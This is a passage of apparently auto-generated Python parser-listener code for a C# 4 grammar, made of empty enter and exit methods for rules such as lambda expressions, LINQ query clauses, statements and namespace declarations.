def enterRelational_expression(self, ctx: CSharp4Parser.Relational_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#relational_expression.
def exitRelational_expression(self, ctx: CSharp4Parser.Relational_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#scan_for_shift_generic_precedence.
def enterScan_for_shift_generic_precedence(self, ctx: CSharp4Parser.Scan_for_shift_generic_precedenceContext):
pass
# Exit a parse tree produced by CSharp4Parser#scan_for_shift_generic_precedence.
def exitScan_for_shift_generic_precedence(self, ctx: CSharp4Parser.Scan_for_shift_generic_precedenceContext):
pass
# Enter a parse tree produced by CSharp4Parser#shift_disambiguation_token.
def enterShift_disambiguation_token(self, ctx: CSharp4Parser.Shift_disambiguation_tokenContext):
pass
# Exit a parse tree produced by CSharp4Parser#shift_disambiguation_token.
def exitShift_disambiguation_token(self, ctx: CSharp4Parser.Shift_disambiguation_tokenContext):
pass
# Enter a parse tree produced by CSharp4Parser#isType.
def enterIsType(self, ctx: CSharp4Parser.IsTypeContext):
pass
# Exit a parse tree produced by CSharp4Parser#isType.
def exitIsType(self, ctx: CSharp4Parser.IsTypeContext):
pass
# Enter a parse tree produced by CSharp4Parser#is_disambiguation_token.
def enterIs_disambiguation_token(self, ctx: CSharp4Parser.Is_disambiguation_tokenContext):
pass
# Exit a parse tree produced by CSharp4Parser#is_disambiguation_token.
def exitIs_disambiguation_token(self, ctx: CSharp4Parser.Is_disambiguation_tokenContext):
pass
# Enter a parse tree produced by CSharp4Parser#equality_expression.
def enterEquality_expression(self, ctx: CSharp4Parser.Equality_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#equality_expression.
def exitEquality_expression(self, ctx: CSharp4Parser.Equality_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#and_expression.
def enterAnd_expression(self, ctx: CSharp4Parser.And_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#and_expression.
def exitAnd_expression(self, ctx: CSharp4Parser.And_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#exclusive_or_expression.
def enterExclusive_or_expression(self, ctx: CSharp4Parser.Exclusive_or_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#exclusive_or_expression.
def exitExclusive_or_expression(self, ctx: CSharp4Parser.Exclusive_or_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#inclusive_or_expression.
def enterInclusive_or_expression(self, ctx: CSharp4Parser.Inclusive_or_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#inclusive_or_expression.
def exitInclusive_or_expression(self, ctx: CSharp4Parser.Inclusive_or_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#conditional_and_expression.
def enterConditional_and_expression(self, ctx: CSharp4Parser.Conditional_and_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#conditional_and_expression.
def exitConditional_and_expression(self, ctx: CSharp4Parser.Conditional_and_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#conditional_or_expression.
def enterConditional_or_expression(self, ctx: CSharp4Parser.Conditional_or_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#conditional_or_expression.
def exitConditional_or_expression(self, ctx: CSharp4Parser.Conditional_or_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#null_coalescing_expression.
def enterNull_coalescing_expression(self, ctx: CSharp4Parser.Null_coalescing_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#null_coalescing_expression.
def exitNull_coalescing_expression(self, ctx: CSharp4Parser.Null_coalescing_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#conditional_expression.
def enterConditional_expression(self, ctx: CSharp4Parser.Conditional_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#conditional_expression.
def exitConditional_expression(self, ctx: CSharp4Parser.Conditional_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#lambda_expression.
def enterLambda_expression(self, ctx: CSharp4Parser.Lambda_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#lambda_expression.
def exitLambda_expression(self, ctx: CSharp4Parser.Lambda_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_method_expression.
def enterAnonymous_method_expression(self, ctx: CSharp4Parser.Anonymous_method_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_method_expression.
def exitAnonymous_method_expression(self, ctx: CSharp4Parser.Anonymous_method_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_function_signature.
def enterAnonymous_function_signature(self, ctx: CSharp4Parser.Anonymous_function_signatureContext):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_function_signature.
def exitAnonymous_function_signature(self, ctx: CSharp4Parser.Anonymous_function_signatureContext):
pass
# Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_signature.
def enterExplicit_anonymous_function_signature(self, ctx: CSharp4Parser.Explicit_anonymous_function_signatureContext):
pass
# Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_signature.
def exitExplicit_anonymous_function_signature(self, ctx: CSharp4Parser.Explicit_anonymous_function_signatureContext):
pass
# Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter_list.
def enterExplicit_anonymous_function_parameter_list(self, ctx: CSharp4Parser.Explicit_anonymous_function_parameter_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter_list.
def exitExplicit_anonymous_function_parameter_list(self, ctx: CSharp4Parser.Explicit_anonymous_function_parameter_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter.
def enterExplicit_anonymous_function_parameter(self, ctx: CSharp4Parser.Explicit_anonymous_function_parameterContext):
pass
# Exit a parse tree produced by CSharp4Parser#explicit_anonymous_function_parameter.
def exitExplicit_anonymous_function_parameter(self, ctx: CSharp4Parser.Explicit_anonymous_function_parameterContext):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_function_parameter_modifier.
def enterAnonymous_function_parameter_modifier(self, ctx: CSharp4Parser.Anonymous_function_parameter_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_function_parameter_modifier.
def exitAnonymous_function_parameter_modifier(self, ctx: CSharp4Parser.Anonymous_function_parameter_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_signature.
def enterImplicit_anonymous_function_signature(self, ctx: CSharp4Parser.Implicit_anonymous_function_signatureContext):
pass
# Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_signature.
def exitImplicit_anonymous_function_signature(self, ctx: CSharp4Parser.Implicit_anonymous_function_signatureContext):
pass
# Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter_list.
def enterImplicit_anonymous_function_parameter_list(self, ctx: CSharp4Parser.Implicit_anonymous_function_parameter_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter_list.
def exitImplicit_anonymous_function_parameter_list(self, ctx: CSharp4Parser.Implicit_anonymous_function_parameter_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter.
def enterImplicit_anonymous_function_parameter(self, ctx: CSharp4Parser.Implicit_anonymous_function_parameterContext):
pass
# Exit a parse tree produced by CSharp4Parser#implicit_anonymous_function_parameter.
def exitImplicit_anonymous_function_parameter(self, ctx: CSharp4Parser.Implicit_anonymous_function_parameterContext):
pass
# Enter a parse tree produced by CSharp4Parser#anonymous_function_body.
def enterAnonymous_function_body(self, ctx: CSharp4Parser.Anonymous_function_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#anonymous_function_body.
def exitAnonymous_function_body(self, ctx: CSharp4Parser.Anonymous_function_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#query_expression.
def enterQuery_expression(self, ctx: CSharp4Parser.Query_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#query_expression.
def exitQuery_expression(self, ctx: CSharp4Parser.Query_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#from_clause.
def enterFrom_clause(self, ctx: CSharp4Parser.From_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#from_clause.
def exitFrom_clause(self, ctx: CSharp4Parser.From_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#query_body.
def enterQuery_body(self, ctx: CSharp4Parser.Query_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#query_body.
def exitQuery_body(self, ctx: CSharp4Parser.Query_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#query_body_clauses.
def enterQuery_body_clauses(self, ctx: CSharp4Parser.Query_body_clausesContext):
pass
# Exit a parse tree produced by CSharp4Parser#query_body_clauses.
def exitQuery_body_clauses(self, ctx: CSharp4Parser.Query_body_clausesContext):
pass
# Enter a parse tree produced by CSharp4Parser#query_body_clause.
def enterQuery_body_clause(self, ctx: CSharp4Parser.Query_body_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#query_body_clause.
def exitQuery_body_clause(self, ctx: CSharp4Parser.Query_body_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#let_clause.
def enterLet_clause(self, ctx: CSharp4Parser.Let_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#let_clause.
def exitLet_clause(self, ctx: CSharp4Parser.Let_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#where_clause.
def enterWhere_clause(self, ctx: CSharp4Parser.Where_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#where_clause.
def exitWhere_clause(self, ctx: CSharp4Parser.Where_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#join_clause.
def enterJoin_clause(self, ctx: CSharp4Parser.Join_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#join_clause.
def exitJoin_clause(self, ctx: CSharp4Parser.Join_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#join_into_clause.
def enterJoin_into_clause(self, ctx: CSharp4Parser.Join_into_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#join_into_clause.
def exitJoin_into_clause(self, ctx: CSharp4Parser.Join_into_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#combined_join_clause.
def enterCombined_join_clause(self, ctx: CSharp4Parser.Combined_join_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#combined_join_clause.
def exitCombined_join_clause(self, ctx: CSharp4Parser.Combined_join_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#orderby_clause.
def enterOrderby_clause(self, ctx: CSharp4Parser.Orderby_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#orderby_clause.
def exitOrderby_clause(self, ctx: CSharp4Parser.Orderby_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#orderings.
def enterOrderings(self, ctx: CSharp4Parser.OrderingsContext):
pass
# Exit a parse tree produced by CSharp4Parser#orderings.
def exitOrderings(self, ctx: CSharp4Parser.OrderingsContext):
pass
# Enter a parse tree produced by CSharp4Parser#ordering.
def enterOrdering(self, ctx: CSharp4Parser.OrderingContext):
pass
# Exit a parse tree produced by CSharp4Parser#ordering.
def exitOrdering(self, ctx: CSharp4Parser.OrderingContext):
pass
# Enter a parse tree produced by CSharp4Parser#ordering_direction.
def enterOrdering_direction(self, ctx: CSharp4Parser.Ordering_directionContext):
pass
# Exit a parse tree produced by CSharp4Parser#ordering_direction.
def exitOrdering_direction(self, ctx: CSharp4Parser.Ordering_directionContext):
pass
# Enter a parse tree produced by CSharp4Parser#select_or_group_clause.
def enterSelect_or_group_clause(self, ctx: CSharp4Parser.Select_or_group_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#select_or_group_clause.
def exitSelect_or_group_clause(self, ctx: CSharp4Parser.Select_or_group_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#select_clause.
def enterSelect_clause(self, ctx: CSharp4Parser.Select_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#select_clause.
def exitSelect_clause(self, ctx: CSharp4Parser.Select_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#group_clause.
def enterGroup_clause(self, ctx: CSharp4Parser.Group_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#group_clause.
def exitGroup_clause(self, ctx: CSharp4Parser.Group_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#query_continuation.
def enterQuery_continuation(self, ctx: CSharp4Parser.Query_continuationContext):
pass
# Exit a parse tree produced by CSharp4Parser#query_continuation.
def exitQuery_continuation(self, ctx: CSharp4Parser.Query_continuationContext):
pass
# Enter a parse tree produced by CSharp4Parser#assignment.
def enterAssignment(self, ctx: CSharp4Parser.AssignmentContext):
pass
# Exit a parse tree produced by CSharp4Parser#assignment.
def exitAssignment(self, ctx: CSharp4Parser.AssignmentContext):
pass
# Enter a parse tree produced by CSharp4Parser#assignment_operator.
def enterAssignment_operator(self, ctx: CSharp4Parser.Assignment_operatorContext):
pass
# Exit a parse tree produced by CSharp4Parser#assignment_operator.
def exitAssignment_operator(self, ctx: CSharp4Parser.Assignment_operatorContext):
pass
# Enter a parse tree produced by CSharp4Parser#expression.
def enterExpression(self, ctx: CSharp4Parser.ExpressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#expression.
def exitExpression(self, ctx: CSharp4Parser.ExpressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#non_assignment_expression.
def enterNon_assignment_expression(self, ctx: CSharp4Parser.Non_assignment_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#non_assignment_expression.
def exitNon_assignment_expression(self, ctx: CSharp4Parser.Non_assignment_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#constant_expression.
def enterConstant_expression(self, ctx: CSharp4Parser.Constant_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#constant_expression.
def exitConstant_expression(self, ctx: CSharp4Parser.Constant_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#boolean_expression.
def enterBoolean_expression(self, ctx: CSharp4Parser.Boolean_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#boolean_expression.
def exitBoolean_expression(self, ctx: CSharp4Parser.Boolean_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#statement.
def enterStatement(self, ctx: CSharp4Parser.StatementContext):
pass
# Exit a parse tree produced by CSharp4Parser#statement.
def exitStatement(self, ctx: CSharp4Parser.StatementContext):
pass
# Enter a parse tree produced by CSharp4Parser#embedded_statement.
def enterEmbedded_statement(self, ctx: CSharp4Parser.Embedded_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#embedded_statement.
def exitEmbedded_statement(self, ctx: CSharp4Parser.Embedded_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#simple_embedded_statement.
def enterSimple_embedded_statement(self, ctx: CSharp4Parser.Simple_embedded_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#simple_embedded_statement.
def exitSimple_embedded_statement(self, ctx: CSharp4Parser.Simple_embedded_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#block.
def enterBlock(self, ctx: CSharp4Parser.BlockContext):
pass
# Exit a parse tree produced by CSharp4Parser#block.
def exitBlock(self, ctx: CSharp4Parser.BlockContext):
pass
# Enter a parse tree produced by CSharp4Parser#statement_list.
def enterStatement_list(self, ctx: CSharp4Parser.Statement_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#statement_list.
def exitStatement_list(self, ctx: CSharp4Parser.Statement_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#empty_statement.
def enterEmpty_statement(self, ctx: CSharp4Parser.Empty_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#empty_statement.
def exitEmpty_statement(self, ctx: CSharp4Parser.Empty_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#labeled_statement.
def enterLabeled_statement(self, ctx: CSharp4Parser.Labeled_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#labeled_statement.
def exitLabeled_statement(self, ctx: CSharp4Parser.Labeled_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#declaration_statement.
def enterDeclaration_statement(self, ctx: CSharp4Parser.Declaration_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#declaration_statement.
def exitDeclaration_statement(self, ctx: CSharp4Parser.Declaration_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declaration.
def enterLocal_variable_declaration(self, ctx: CSharp4Parser.Local_variable_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declaration.
def exitLocal_variable_declaration(self, ctx: CSharp4Parser.Local_variable_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_type.
def enterLocal_variable_type(self, ctx: CSharp4Parser.Local_variable_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_type.
def exitLocal_variable_type(self, ctx: CSharp4Parser.Local_variable_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declarators.
def enterLocal_variable_declarators(self, ctx: CSharp4Parser.Local_variable_declaratorsContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declarators.
def exitLocal_variable_declarators(self, ctx: CSharp4Parser.Local_variable_declaratorsContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_declarator.
def enterLocal_variable_declarator(self, ctx: CSharp4Parser.Local_variable_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_declarator.
def exitLocal_variable_declarator(self, ctx: CSharp4Parser.Local_variable_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_initializer.
def enterLocal_variable_initializer(self, ctx: CSharp4Parser.Local_variable_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_initializer.
def exitLocal_variable_initializer(self, ctx: CSharp4Parser.Local_variable_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_constant_declaration.
def enterLocal_constant_declaration(self, ctx: CSharp4Parser.Local_constant_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_constant_declaration.
def exitLocal_constant_declaration(self, ctx: CSharp4Parser.Local_constant_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#expression_statement.
def enterExpression_statement(self, ctx: CSharp4Parser.Expression_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#expression_statement.
def exitExpression_statement(self, ctx: CSharp4Parser.Expression_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#statement_expression.
def enterStatement_expression(self, ctx: CSharp4Parser.Statement_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#statement_expression.
def exitStatement_expression(self, ctx: CSharp4Parser.Statement_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#selection_statement.
def enterSelection_statement(self, ctx: CSharp4Parser.Selection_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#selection_statement.
def exitSelection_statement(self, ctx: CSharp4Parser.Selection_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#ifBodyBlock.
def enterIfBodyBlock(self, ctx: CSharp4Parser.IfBodyBlockContext):
pass
# Exit a parse tree produced by CSharp4Parser#ifBodyBlock.
def exitIfBodyBlock(self, ctx: CSharp4Parser.IfBodyBlockContext):
pass
# Enter a parse tree produced by CSharp4Parser#ifBodySingle.
def enterIfBodySingle(self, ctx: CSharp4Parser.IfBodySingleContext):
pass
# Exit a parse tree produced by CSharp4Parser#ifBodySingle.
def exitIfBodySingle(self, ctx: CSharp4Parser.IfBodySingleContext):
pass
# Enter a parse tree produced by CSharp4Parser#if_statement.
def enterIf_statement(self, ctx: CSharp4Parser.If_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#if_statement.
def exitIf_statement(self, ctx: CSharp4Parser.If_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_statement.
def enterSwitch_statement(self, ctx: CSharp4Parser.Switch_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_statement.
def exitSwitch_statement(self, ctx: CSharp4Parser.Switch_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_block.
def enterSwitch_block(self, ctx: CSharp4Parser.Switch_blockContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_block.
def exitSwitch_block(self, ctx: CSharp4Parser.Switch_blockContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_sections.
def enterSwitch_sections(self, ctx: CSharp4Parser.Switch_sectionsContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_sections.
def exitSwitch_sections(self, ctx: CSharp4Parser.Switch_sectionsContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_section.
def enterSwitch_section(self, ctx: CSharp4Parser.Switch_sectionContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_section.
def exitSwitch_section(self, ctx: CSharp4Parser.Switch_sectionContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_labels.
def enterSwitch_labels(self, ctx: CSharp4Parser.Switch_labelsContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_labels.
def exitSwitch_labels(self, ctx: CSharp4Parser.Switch_labelsContext):
pass
# Enter a parse tree produced by CSharp4Parser#switch_label.
def enterSwitch_label(self, ctx: CSharp4Parser.Switch_labelContext):
pass
# Exit a parse tree produced by CSharp4Parser#switch_label.
def exitSwitch_label(self, ctx: CSharp4Parser.Switch_labelContext):
pass
# Enter a parse tree produced by CSharp4Parser#iteration_statement.
def enterIteration_statement(self, ctx: CSharp4Parser.Iteration_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#iteration_statement.
def exitIteration_statement(self, ctx: CSharp4Parser.Iteration_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#while_statement.
def enterWhile_statement(self, ctx: CSharp4Parser.While_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#while_statement.
def exitWhile_statement(self, ctx: CSharp4Parser.While_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#do_statement.
def enterDo_statement(self, ctx: CSharp4Parser.Do_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#do_statement.
def exitDo_statement(self, ctx: CSharp4Parser.Do_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#for_statement.
def enterFor_statement(self, ctx: CSharp4Parser.For_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#for_statement.
def exitFor_statement(self, ctx: CSharp4Parser.For_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#for_initializer.
def enterFor_initializer(self, ctx: CSharp4Parser.For_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#for_initializer.
def exitFor_initializer(self, ctx: CSharp4Parser.For_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#for_condition.
def enterFor_condition(self, ctx: CSharp4Parser.For_conditionContext):
pass
# Exit a parse tree produced by CSharp4Parser#for_condition.
def exitFor_condition(self, ctx: CSharp4Parser.For_conditionContext):
pass
# Enter a parse tree produced by CSharp4Parser#for_iterator.
def enterFor_iterator(self, ctx: CSharp4Parser.For_iteratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#for_iterator.
def exitFor_iterator(self, ctx: CSharp4Parser.For_iteratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#statement_expression_list.
def enterStatement_expression_list(self, ctx: CSharp4Parser.Statement_expression_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#statement_expression_list.
def exitStatement_expression_list(self, ctx: CSharp4Parser.Statement_expression_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#foreach_statement.
def enterForeach_statement(self, ctx: CSharp4Parser.Foreach_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#foreach_statement.
def exitForeach_statement(self, ctx: CSharp4Parser.Foreach_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#jump_statement.
def enterJump_statement(self, ctx: CSharp4Parser.Jump_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#jump_statement.
def exitJump_statement(self, ctx: CSharp4Parser.Jump_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#break_statement.
def enterBreak_statement(self, ctx: CSharp4Parser.Break_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#break_statement.
def exitBreak_statement(self, ctx: CSharp4Parser.Break_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#continue_statement.
def enterContinue_statement(self, ctx: CSharp4Parser.Continue_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#continue_statement.
def exitContinue_statement(self, ctx: CSharp4Parser.Continue_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#goto_statement.
def enterGoto_statement(self, ctx: CSharp4Parser.Goto_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#goto_statement.
def exitGoto_statement(self, ctx: CSharp4Parser.Goto_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#return_statement.
def enterReturn_statement(self, ctx: CSharp4Parser.Return_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#return_statement.
def exitReturn_statement(self, ctx: CSharp4Parser.Return_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#throw_statement.
def enterThrow_statement(self, ctx: CSharp4Parser.Throw_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#throw_statement.
def exitThrow_statement(self, ctx: CSharp4Parser.Throw_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#try_statement.
def enterTry_statement(self, ctx: CSharp4Parser.Try_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#try_statement.
def exitTry_statement(self, ctx: CSharp4Parser.Try_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#catch_clauses.
def enterCatch_clauses(self, ctx: CSharp4Parser.Catch_clausesContext):
pass
# Exit a parse tree produced by CSharp4Parser#catch_clauses.
def exitCatch_clauses(self, ctx: CSharp4Parser.Catch_clausesContext):
pass
# Enter a parse tree produced by CSharp4Parser#specific_catch_clauses.
def enterSpecific_catch_clauses(self, ctx: CSharp4Parser.Specific_catch_clausesContext):
pass
# Exit a parse tree produced by CSharp4Parser#specific_catch_clauses.
def exitSpecific_catch_clauses(self, ctx: CSharp4Parser.Specific_catch_clausesContext):
pass
# Enter a parse tree produced by CSharp4Parser#specific_catch_clause.
def enterSpecific_catch_clause(self, ctx: CSharp4Parser.Specific_catch_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#specific_catch_clause.
def exitSpecific_catch_clause(self, ctx: CSharp4Parser.Specific_catch_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#general_catch_clause.
def enterGeneral_catch_clause(self, ctx: CSharp4Parser.General_catch_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#general_catch_clause.
def exitGeneral_catch_clause(self, ctx: CSharp4Parser.General_catch_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#finally_clause.
def enterFinally_clause(self, ctx: CSharp4Parser.Finally_clauseContext):
pass
# Exit a parse tree produced by CSharp4Parser#finally_clause.
def exitFinally_clause(self, ctx: CSharp4Parser.Finally_clauseContext):
pass
# Enter a parse tree produced by CSharp4Parser#checked_statement.
def enterChecked_statement(self, ctx: CSharp4Parser.Checked_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#checked_statement.
def exitChecked_statement(self, ctx: CSharp4Parser.Checked_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#unchecked_statement.
def enterUnchecked_statement(self, ctx: CSharp4Parser.Unchecked_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#unchecked_statement.
def exitUnchecked_statement(self, ctx: CSharp4Parser.Unchecked_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#lock_statement.
def enterLock_statement(self, ctx: CSharp4Parser.Lock_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#lock_statement.
def exitLock_statement(self, ctx: CSharp4Parser.Lock_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#using_statement.
def enterUsing_statement(self, ctx: CSharp4Parser.Using_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#using_statement.
def exitUsing_statement(self, ctx: CSharp4Parser.Using_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#resource_acquisition.
def enterResource_acquisition(self, ctx: CSharp4Parser.Resource_acquisitionContext):
pass
# Exit a parse tree produced by CSharp4Parser#resource_acquisition.
def exitResource_acquisition(self, ctx: CSharp4Parser.Resource_acquisitionContext):
pass
# Enter a parse tree produced by CSharp4Parser#yield_statement.
def enterYield_statement(self, ctx: CSharp4Parser.Yield_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#yield_statement.
def exitYield_statement(self, ctx: CSharp4Parser.Yield_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#parse.
def enterParse(self, ctx: CSharp4Parser.ParseContext):
pass
# Exit a parse tree produced by CSharp4Parser#parse.
def exitParse(self, ctx: CSharp4Parser.ParseContext):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_declaration.
def enterNamespace_declaration(self, ctx: CSharp4Parser.Namespace_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_declaration.
def exitNamespace_declaration(self, ctx: CSharp4Parser.Namespace_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#qualified_identifier.
def enterQualified_identifier(self, ctx: CSharp4Parser.Qualified_identifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#qualified_identifier.
def exitQualified_identifier(self, ctx: CSharp4Parser.Qualified_identifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#namespace_body.
def enterNamespace_body(self, ctx: CSharp4Parser.Namespace_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#namespace_body.
def exitNamespace_body(self, ctx: CSharp4Parser.Namespace_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#extern_alias_directives.
def enterExtern_alias_directives(self, ctx: CSharp4Parser.Extern_alias_directivesContext):
pass
# Exit a parse tree produced by CSharp4Parser#extern_alias_directives.
def exitExtern_alias_directives(self, ctx: CSharp4Parser.Extern_alias_directivesContext):
pass
# Enter a parse tree produced by CSharp4Parser#extern_alias_directive.
